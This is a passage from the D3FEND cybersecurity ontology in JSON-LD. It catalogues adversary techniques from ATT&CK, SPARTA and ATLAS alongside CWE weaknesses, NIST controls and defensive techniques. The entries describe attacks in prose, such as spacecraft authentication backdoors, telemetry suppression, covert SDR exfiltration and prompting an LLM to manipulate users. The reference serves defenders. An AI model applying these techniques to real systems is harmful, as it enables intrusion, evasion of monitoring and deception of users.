        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance | Preventive Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6(1)"
    },
    {
      "@id": "d3f:InputDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving human-machine interface devices, such as keyboards, mice, or touchscreens.",
      "rdfs:label": "Input Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N323a361ca61b4aa69632d8fe1cd23e9e"
        }
      ]
    },
    {
      "@id": "_:N323a361ca61b4aa69632d8fe1cd23e9e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:T1036.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.011",
      "d3f:definition": "Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc/<PID>/cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges.",
      "rdfs:label": "Overwrite Process Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:CWE-221",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-221",
      "d3f:definition": "The product does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis.",
      "rdfs:label": "Information Loss or Omission",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-271",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-271",
      "d3f:definition": "The product does not drop privileges before passing control of a resource to an actor that does not have those privileges.",
      "rdfs:label": "Privilege Dropping / Lowering Errors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:KernelProcessTable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A data structure in the kernel which is a table containing all of the information that must be saved when the CPU switches from running one process to another in a multitasking system. It allows the operating system to track all the process's execution status, and contains the For every process managed by the kernel, there is a process control block (PCB) in the process table.",
      "rdfs:isDefinedBy": {
        "@id": "https://encyclopedia2.thefreedictionary.com/process+table"
      },
      "rdfs:label": "Kernel Process Table",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Process_(computing)"
        },
        {
          "@id": "https://www.geeksforgeeks.org/process-table-and-process-control-block-pcb/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1070.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.003",
      "d3f:definition": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.",
      "d3f:modifies": {
        "@id": "d3f:CommandHistoryLog"
      },
      "rdfs:label": "Clear Command History",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N2d12395fb9ed4b7ba9676d081bebbece"
        }
      ]
    },
    {
      "@id": "_:N2d12395fb9ed4b7ba9676d081bebbece",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:IA-0007.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0007.02",
      "d3f:definition": "Adversaries may use a compromised, mission-owned ground system to transmit legitimate-looking commands to the target spacecraft. Because the ground equipment is already configured for the mission, correct waveforms, framing, dictionaries, and scheduling, the attacker’s traffic blends with routine operations. Initial access unfolds by inserting commands or procedures into existing timelines, modifying rate/size limits or command queues, or invoking maintenance dictionaries and rapid-response workflows that accept broader command sets. Pre-positioned scripts can chain actions across multiple passes and stations, while telemetry routing provides immediate feedback to refine follow-on steps. Exfiltration can be embedded in standard downlink channels or forwarded through gateways as ordinary mission data. The distinguishing feature is that command origin appears valid, transmitted from approved apertures using expected parameters, so the first execution event is not a protocol anomaly but a misuse of legitimate command authority obtained through the compromised ground system.",
      "rdfs:label": "Malicious Commanding via Valid GS - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0007/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0007"
      },
      "skos:prefLabel": "Malicious Commanding via Valid GS"
    },
    {
      "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://pure.uva.nl/ws/files/1739225/132135_thesis.pdf"
      },
      "d3f:kb-author": "van den Bos, J.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:FileContentDecompressionChecking"
        },
        {
          "@id": "d3f:FileInternalStructureVerification"
        },
        {
          "@id": "d3f:FileMagicByteVerification"
        },
        {
          "@id": "d3f:FileMetadataConsistencyValidation"
        }
      ],
      "d3f:kb-reference-title": "Gathering Evidence: Model-Driven Software Engineering in Automated Digital Forensics",
      "rdfs:label": "Reference - Gathering Evidence: Model-Driven Software Engineering in Automated Digital Forensics"
    },
    {
      "@id": "d3f:Clustering",
      "@type": "owl:Class",
      "rdfs:label": "Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Summarizing"
      }
    },
    {
      "@id": "d3f:SPARTAPersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0005"
      },
      "rdfs:label": "Persistence Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N2841bacad5dc4dfd8fe150ea8d2e04d0"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:N2841bacad5dc4dfd8fe150ea8d2e04d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0005"
      }
    },
    {
      "@id": "d3f:CWE-327",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-327",
      "d3f:definition": "The product uses a broken or risky cryptographic algorithm or protocol.",
      "rdfs:label": "Use of a Broken or Risky Cryptographic Algorithm",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:DE-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0002.03",
      "d3f:definition": "In this variant, telemetry is suppressed at the source by manipulating on-board generation or transmission. Methods include disabling or pausing telemetry publishers, altering packet filters and rates, muting event/report channels, reconfiguring recorder playback, retuning/muting transmitters, or switching to modes that emit only minimal beacons. The spacecraft continues operating, but the downlink no longer reflects true activity or arrives too sparsely to support monitoring. By constraining what is produced or transmitted, the adversary reduces opportunities for detection while other actions proceed.",
      "rdfs:label": "Inhibit Spacecraft Functionality - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0002"
      },
      "skos:prefLabel": "Inhibit Spacecraft Functionality"
    },
    {
      "@id": "d3f:ProcessSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Process segments are distinct partitions of the memory space of a running process.  Heap, data, code, and stack segments are examples of process segments.",
      "d3f:synonym": "Process Memory",
      "rdfs:label": "Process Segment",
      "rdfs:subClassOf": {
        "@id": "d3f:BinarySegment"
      }
    },
    {
      "@id": "d3f:EX-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0003",
      "d3f:definition": "The adversary alters how the spacecraft validates authority so that future inputs are accepted on their terms. Modifications can target code (patching flight binaries, hot-patching functions in memory, hooking command handlers), data (changing key identifiers, policy tables, or counter initialization), or control flow (short-circuiting MAC checks, widening anti-replay windows, bypassing interlocks on specific opcodes). Common choke points include telecommand verification routines, bootloader or update verifiers, gateway processors that bridge payload and bus traffic, and maintenance dictionaries invoked in special modes. Subtle variants preserve outward behavior, producing normal-looking acknowledgments and counters, while internally accepting a broader set of origins, opcodes, or timetags. Others introduce conditional logic so the backdoor only activates under specific geometry or timing, masking during routine audit. Once resident, the modified process becomes the new trust oracle, enabling recurring execution for the attacker and, in some cases, denying legitimate control by causing authentic inputs to fail verification or to be deprioritized.",
      "rdfs:label": "Modify Authentication Process - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Modify Authentication Process"
    },
    {
      "@id": "d3f:T1010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1010",
      "d3f:definition": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetOpenWindows"
        }
      ],
      "rdfs:label": "Application Window Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nb7d628cc501245b1b4327cdc2e7e6dd6"
        },
        {
          "@id": "_:N7dd23a1d822f4f54a421a3bd1d6b13ac"
        }
      ]
    },
    {
      "@id": "_:Nb7d628cc501245b1b4327cdc2e7e6dd6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N7dd23a1d822f4f54a421a3bd1d6b13ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetOpenWindows"
      }
    },
    {
      "@id": "d3f:T1522",
      "@type": "owl:Class",
      "d3f:attack-id": "T1522",
      "d3f:definition": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.005",
      "rdfs:label": "Cloud Instance Metadata API",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CWE-334",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-334",
      "d3f:definition": "The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.",
      "rdfs:label": "Small Space of Random Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:CWE-304",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-304",
      "d3f:definition": "The product implements an authentication technique, but it skips a step that weakens the technique.",
      "rdfs:label": "Missing Critical Step in Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-303"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:unmounts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x unmounts y: An operation x removes the access via computer system's file system the availability of files and directories on storage artifact y.  Unmounts reverse or undo prior mount operations.",
      "rdfs:label": "unmounts",
      "rdfs:seeAlso": {
        "@id": "dbr:Mount_(computing)"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:OperationalProcessMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalProcessMonitoring"
      ],
      "d3f:d3fend-id": "D3-OPM",
      "d3f:definition": "Monitoring physical parameters and operator actions related to an operational environment.",
      "d3f:kb-article": "## How it works\n\nWhile some Operational Technology systems are designed to operate without human intervention, most systems are designed with the ability to monitor and modify the physical process with user input.\n\nThis technique detects adversarial risks to operational processes by observing physical events and operator actions and analyzing event logs.\n\nKey steps in operational process security monitoring are:\n\n1. Read logs generated by controllers, and HMIs, through DAU's and DA agents;\n\n2. Produce digital event records;\n\n3. Display the aggregated data to a device such as an HMI or process historian, and write those records to event logs and/or to the OT process data historian for traceability and incident reconstruction.\n\n4. Monitor the procees and detect incidents or indicators of tampering such as:\n- malfunctions\n- unauthorized commands,\n- unsafe setpoint changes,\n- alarm suppression, and\n- anomalous mode transitions;\n\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-GuideToOTSecurity"
      },
      "d3f:monitors": {
        "@id": "d3f:EventLog"
      },
      "d3f:synonym": "Supervisory Control Monitoring",
      "d3f:uses": {
        "@id": "d3f:OTProcessDataHistorian"
      },
      "rdfs:label": "Operational Process Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N0dc56235800a4b3fb37f56f479fb163c"
        },
        {
          "@id": "_:Nc6acacd5db0045ceaf4c83b385ca3ecb"
        }
      ]
    },
    {
      "@id": "_:N0dc56235800a4b3fb37f56f479fb163c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:Nc6acacd5db0045ceaf4c83b385ca3ecb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessDataHistorian"
      }
    },
    {
      "@id": "d3f:IdentifierAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IdentifierAnalysis"
      ],
      "d3f:d3fend-id": "D3-ID",
      "d3f:definition": "Analyzing identifier artifacts such as IP address, domain names, or URL(I)s.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Identifier Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nab552aca4c4c407387b94225c2488a7a"
        }
      ]
    },
    {
      "@id": "_:Nab552aca4c4c407387b94225c2488a7a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:ContainerRuntime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software layer between a container process and a kernel which often mediates the invocation of a system call.",
      "d3f:runs": {
        "@id": "d3f:ContainerImage"
      },
      "rdfs:label": "Container Runtime",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ContainerProcess"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:SystemCall"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N6dc3673f033e4a929cb38cbe58262937"
        }
      ]
    },
    {
      "@id": "_:N6dc3673f033e4a929cb38cbe58262937",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerImage"
      }
    },
    {
      "@id": "d3f:AML.T0088",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0088",
      "d3f:definition": "Adversaries may use generative artificial intelligence (GenAI) to create synthetic media (i.e. imagery, video, audio, and text) that appear authentic. These \"[deepfakes]( https://en.wikipedia.org/wiki/Deepfake)\" may mimic a real person or depict fictional personas. Adversaries may use deepfakes for impersonation to conduct [Phishing](/techniques/AML.T0052) or to evade AI applications such as biometric identity verification systems (see [Evade AI Model](/techniques/AML.T0015)).\n\nManipulation of media has been possible for a long time, however GenAI reduces the skill and level of effort required, allowing adversaries to rapidly scale operations to target more users or systems. It also makes real-time manipulations feasible.\n\nAdversaries may utilize open-source models and software that were designed for legitimate use cases to generate deepfakes for malicious use. However, there are some projects specifically tailored towards malicious use cases such as [ProKYC](https://www.catonetworks.com/blog/prokyc-selling-deepfake-tool-for-account-fraud-attacks/).",
      "rdfs:label": "Generate Deepfakes - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0088"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Generate Deepfakes"
    },
    {
      "@id": "d3f:T1187",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1187",
      "d3f:definition": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.",
      "d3f:may-modify": {
        "@id": "d3f:WindowsShortcutFile"
      },
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Forced Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Nfa893e7813704b94902f0d859d7291e9"
        },
        {
          "@id": "_:N1dfc908fe850441d87d50770efff09ef"
        },
        {
          "@id": "_:N547b635ed8314da996fbc1610f5c3b29"
        }
      ]
    },
    {
      "@id": "_:Nfa893e7813704b94902f0d859d7291e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsShortcutFile"
      }
    },
    {
      "@id": "_:N1dfc908fe850441d87d50770efff09ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:N547b635ed8314da996fbc1610f5c3b29",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:SeqGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SEQ",
      "d3f:definition": "Sequence Generation Framework (SeqGAN) models the data generator as a stochastic policy in reinforcement learning (RL), SeqGAN bypasses the generator differentiation problem by directly performing gradient policy update.",
      "d3f:kb-article": "## References\nYu, L., Zhang, W., Wang, J., & Yu, Y. (2017). SeqGAN: Sequence Generative Adversarial Nets with Policy Gradient. ArXiv preprint ArXiv:1609.05473. [Link](https://arxiv.org/abs/1609.05473)",
      "d3f:synonym": "Sequence GAN",
      "rdfs:label": "SeqGAN",
      "rdfs:subClassOf": {
        "@id": "d3f:GenerativeAdversarialNetwork"
      }
    },
    {
      "@id": "d3f:CCI-001210_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, at organization-defined information system components, loads and executes the operating environment from hardware-enforced, read-only media.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001210"
    },
    {
      "@id": "d3f:Reference-IntegrityAssuranceThroughEarlyLoadingInTheBootPhase_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170061127A1"
      },
      "d3f:kb-abstract": "Techniques utilizing library and pre-boot components to ensure that a driver associated with a kernel-mode component is initialized before other drivers during a boot phase are described herein. The library component is processed during a boot phase; the pre-boot component, which may be an alternative to the library component, is processed during a pre-boot phase. By ensuring that the driver is the first driver initialized, the components enable the driver to launch the kernel-mode component before other drivers are initialized. The library component may also determine whether another driver is to be initialized before the kernel-mode component driver, may ensure that kernel-mode component driver is initialized first, and may alert the kernel-mode component. Also, the library component may retrieve information that is to be deleted by the operating system before initialization of drivers and may provide that information to the kernel-mode component.",
      "d3f:kb-author": "Ion-Alexandru Ionescu",
      "d3f:kb-mitre-analysis": "To compromise software or to gain control of a host device, a security exploit can modify driver initialization order used by an operating system and place a driver associated with the security exploit first in a list of drivers initialized by the operating system.\n\nThis patent describes ensuring that a driver associated with the agent is initialized first. To ensure the driver is initialized first, a dependent DLL associated with the driver is configured to be processed before other dependent DLLs. The dependent DLL can be configured to be processed first by various methods, for example if processing is done in alphabetical order, changing its name to be processed first. The dependent DLL, once processed, executes a number of operations to ensure the driver associated with the agent is initialized first. Furthermore, if the initialization order is modified, an alert is provided to the kernel-mode component that notifies the kernel-mode component it was not first and the order had to be altered. It can then take additional actions such as additional monitoring or remediation.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:kb-reference-title": "Integrity assurance through early loading in the boot phase",
      "rdfs:label": "Reference - Integrity assurance through early loading in the boot phase - Crowdstrike Inc"
    },
    {
      "@id": "d3f:AML.T0067",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0067",
      "d3f:definition": "Adversaries may utilize prompts to a large language model (LLM) which manipulate various components of its response in order to make it appear trustworthy to the user. This helps the adversary continue to operate in the victim's environment and evade detection by the users it interacts with.\n\nThe LLM may be instructed to tailor its language to appear more trustworthy to the user or attempt to manipulate the user to take certain actions. Other response components that could be manipulated include links, recommended follow-up actions, retrieved document metadata, and [Citations](/techniques/AML.T0067.000).",
      "rdfs:label": "LLM Trusted Output Components Manipulation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0067"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "LLM Trusted Output Components Manipulation"
    },
    {
      "@id": "d3f:ST0009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to manipulate, interrupt, or destroy the space system(s) and/or data.",
      "d3f:display-order": 9,
      "rdfs:label": "Impact - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:CWE-354",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-354",
      "d3f:definition": "The product does not validate or incorrectly validates the integrity check values or \"checksums\" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission.",
      "rdfs:label": "Improper Validation of Integrity Check Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-345"
        },
        {
          "@id": "d3f:CWE-754"
        }
      ]
    },
    {
      "@id": "d3f:T1562.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1562.006",
      "d3f:definition": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).",
      "rdfs:label": "Indicator Blocking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1562"
      }
    },
    {
      "@id": "d3f:T1655.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1655.001",
      "d3f:definition": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., `com.google.android.gm`).",
      "rdfs:label": "Match Legitimate Name or Location - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1655"
      },
      "skos:prefLabel": "Match Legitimate Name or Location"
    },
    {
      "@id": "d3f:T1209",
      "@type": "owl:Class",
      "d3f:attack-id": "T1209",
      "d3f:definition": "The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.003",
      "rdfs:label": "Time Providers",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:version",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "d3f:definition": "x version y: The product or service x has the version y.",
      "rdfs:label": {
        "@language": "en",
        "@value": "version"
      },
      "rdfs:range": {
        "@id": "_:N20ccee7210a645aa83b52a2ae5a0bf39"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:d3fend-catalog-data-property"
        },
        {
          "@id": "d3f:d3fend-external-control-data-property"
        }
      ]
    },
    {
      "@id": "_:N20ccee7210a645aa83b52a2ae5a0bf39",
      "@type": "rdfs:Datatype",
      "owl:unionOf": {
        "@list": [
          {
            "@id": "xsd:integer"
          },
          {
            "@id": "xsd:string"
          }
        ]
      }
    },
    {
      "@id": "d3f:EXF-0006.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EXF-0006.01",
      "d3f:definition": "Programmable SDRs let an attacker introduce new waveforms or piggyback payloads into existing ones. By modifying DSP chains (filters, mixers, FEC, framing), the actor can: add a low-rate subcarrier under the main modulation, alter preamble/pilot sequences to encode bits, vary puncturing/interleaver patterns as a covert channel, or schedule brief “maintenance” bursts that actually carry exfiltrated data. Changes may be packaged as legitimate updates or configuration profiles so the SDR transmits toward attacker-visible geometry using standard equipment, while mission tooling interprets the emission as routine.",
      "d3f:may-modify": [
        {
          "@id": "d3f:Software-definedRadioConfiguration"
        },
        {
          "@id": "d3f:Software-definedRadioWaveformApplication"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:Software-definedRadio"
      },
      "rdfs:label": "Software Defined Radio - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0006/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EXF-0006"
        },
        {
          "@id": "_:Nf8c81a0f27a84b8a9073550071b05387"
        },
        {
          "@id": "_:N98ed6fb8ac5c4aaa8ee716a8b91026fe"
        },
        {
          "@id": "_:N75a85ca256734875a48c491dbfdb150a"
        }
      ],
      "skos:prefLabel": "Software Defined Radio"
    },
    {
      "@id": "_:Nf8c81a0f27a84b8a9073550071b05387",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "_:N98ed6fb8ac5c4aaa8ee716a8b91026fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "_:N75a85ca256734875a48c491dbfdb150a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:CyberTechnique",
      "@type": "owl:Class",
      "rdfs:label": "Cyber Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Technique"
        },
        {
          "@id": "_:N9b125176c5554f78abe3c4a75f6f6032"
        }
      ]
    },
    {
      "@id": "_:N9b125176c5554f78abe3c4a75f6f6032",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Procedure"
      }
    },
    {
      "@id": "d3f:T1588.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.007",
      "d3f:definition": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)",
      "rdfs:label": "Artificial Intelligence",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:Organization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An organization with a defined mission/goal and a defined boundary, using systems to execute that mission, and with responsibility for managing its own risks and performance. An enterprise may consist of all or some of the following business aspects: acquisition, program management, human resources, financial management, security, and systems, information and mission management",
      "rdfs:label": "Organization",
      "rdfs:seeAlso": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentGroup"
